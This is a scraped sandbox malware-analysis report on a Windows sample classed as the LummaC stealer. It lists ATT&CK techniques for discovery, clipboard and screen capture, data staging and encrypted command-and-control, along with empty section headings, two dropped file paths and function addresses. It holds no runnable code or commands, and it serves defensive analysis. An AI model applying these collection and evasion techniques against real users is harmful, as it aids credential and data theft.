Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.log

C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Function 6CEBB6B0 Relevance: 35.2, APIs: 23, Instructions: 669
COMMON

Function 06EE0EB3 Relevance: 29.6, Strings: 23, Instructions: 800
COMMON

Function 6CEAB6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245
libraryloaderCOMMON

Function 6CEB2970 Relevance: 25.8, APIs: 17, Instructions: 335
COMMON

Function 6CEAAF30 Relevance: 24.3, APIs: 16, Instructions: 335
COMMON

Function 6CEBD410 Relevance: 24.3, APIs: 16, Instructions: 290
COMMON

Function 6CEBD468 Relevance: 21.2, APIs: 14, Instructions: 226
COMMON

Function 6CEB5140 Relevance: 21.2, APIs: 14, Instructions: 203
COMMON

Function 6CEB44C0 Relevance: 19.8, APIs: 13, Instructions: 261
COMMON

Function 6CEBBF00 Relevance: 18.2, APIs: 12, Instructions: 215
COMMON

Function 6CEB64D0 Relevance: 18.2, APIs: 12, Instructions: 159
COMMON

Function 6CEBCB90 Relevance: 18.1, APIs: 12, Instructions: 143
COMMON

Function 6CEAA350 Relevance: 16.7, APIs: 11, Instructions: 206
COMMON

Function 6CEBCD20 Relevance: 15.5, APIs: 10, Instructions: 485
COMMON

Function 6CEB66A0 Relevance: 15.2, APIs: 10, Instructions: 155
COMMON

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre